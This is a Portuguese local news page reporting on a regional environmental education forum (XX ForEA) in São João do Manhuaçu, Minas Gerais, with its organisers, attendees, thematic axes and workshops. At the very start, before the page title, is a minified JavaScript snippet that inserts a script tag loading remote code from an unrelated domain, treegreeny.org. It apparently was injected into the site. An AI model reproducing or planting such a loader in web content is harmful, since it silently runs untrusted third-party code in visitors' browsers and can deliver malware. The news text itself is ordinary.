;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); XX ForEA é realizado em São João do Manhuaçu. - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

XX ForEA é realizado em São João do Manhuaçu.

São João do Manhuaçu foi sede do XX ForEA (Fórum Regional de Educação Ambiental), nos últimos dias 28 e 29. Com extensa programação de palestras, apresentações culturais e oficinas diversas, o evento evidenciou importantes questões ambientais, como o combate ao desmatamento, a preservação das nascentes de água e a consciência ambiental dos cidadãos. Também houve exposição de produtos agroecológicos, eixos temáticos, oficinas construtivas e o Encontro de Gestores Municipais da Zona da Mata, além da elaboração do Documento Final, juntamente com a indicação do município sede do ForEA 2017.

Realizado na EM Dona Durvalina, o XX ForEA contou com expressiva presença do público regional, em especial, educadores ambientais, estudantes, representantes de segmentos sociais e autoridades. O XX ForEA foi realizado pela Prefeitura, por meio das Secretarias Municipais de Educação e Meio Ambiente, em parceria com a Comissão Interinstitucional de Educação Ambiental – Zona da Mata-, IEF, Superintendência Regional de Ensino de Manhuaçu, Univértix, Polícia Militar e Corpo de Bombeiros de Minas Gerais. Entre os presentes, o Vice-prefeito de São João do Manhuaçu, Alcimar Afonso; Promotora de Justiça do Meio Ambiente da Comarca, Vanessa Maia de Amorim Evangelista; Vereador Elias Mariano; Sec. M. de Educação, Andréia Alves Martins; Mobilizadora do SENAR, Isaura da Paixão; Coordenadora regional do CIEA, Betty Giovannoni Oliveira, e Maria Aparecida Salles; Secretário M. de Agricultura de Manhuaçu (rep. do Prefeito de Manhuaçu), Sandro Tavares; Diretor do SAMAL Manhuaçu, Kilder Perígolo; Presidente do SICOOB Credilivre e Vice-presidente do Conselho dos Cafés das Matas de Minas, Sebastião de Lourdes; Sec. M. de Meio Ambiente de Manhumirim, Dhiarles Braga; Vininha Nacif (COMDEC/ Manhuaçu), e Rep. da Polícia Militar do Meio Ambiente, Tenente Xerxes, Sgt. Julio Alves, Sgt. Kennedy, Cb. Edison, e Sd. Ferreira.

No decorrer do evento, a Secretaria M. de Educação prestou homenagens a educadores e estudantes que se destacaram na apresentação de projetos e atividades ambientais. A organização do ForEA concedeu o Diploma de Mérito Ambiental à pessoas, empresas e instituições que deram bom exemplo e se destacaram por sua atuação em favor do meio ambiente, neste último ano.

O ForEA foi implantado em 2006, com a proposta de apresentar e trabalhar os problemas ambientais dos municípios da Bacia Hidrográfica do Rio Manhuaçu e entorno do Parque Estadual da Serra do Brigadeiro e do Parque Nacional do Caparaó, visando a articulação dos membros destas comunidades. Os eixos temáticos locais deste ano foram ‘Manejo da Paisagem para aumentar a oferta de água em propriedades rurais’, ‘De quem é o lixo: meu ou seu?’ e ‘Questões ambientais no contexto da educação ambiental’.

As oficinas construtivas apresentaram temas distintos como ‘Saneamento Básico em Área Rural’, ‘Homeopatia e práticas agropecuárias sustentáveis’, ‘Produção e conservação de água em propriedades rurais’, ‘Pintura orgânica Arte e Entretenimento’, ‘O princípio dos 3Rs e reciclagem nos domicílios e escolas’, ‘Consumo consciente e sustentabilidade no ambiente escolar’, ‘Reciclar para educar’, ‘Educação ambiental lúdica –forma divertida de ensinar’-, ‘Interpretação da paisagem na educação ambiental’, ‘Cafeicultura: impactos ambientais e boas práticas’, ‘Reaproveitamento de PETs para confecção de brinquedos e jardins suspensos’, ‘Preparação de produtos de limpeza ecológicos’, ‘Vivificação de solos’, ‘Reaproveitamento de alimentos’, ‘Fossas sépticas e biofertilização em áreas rurais’, ‘Técnicas de construção de barraginhas para captação de águas pluviais’, ‘Arte com materiais recicláveis’, ‘compostagem domiciliar’, ‘Plantas medicinais e práticas integrativas de saúde’, ‘Coleta seletiva solidária com inclusão de catadores’ e ‘Formação de educadores ambientais’.

(Thomaz Jr. – fotos: Míriam Fotos/ Isaac e Patrícia Sad)

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.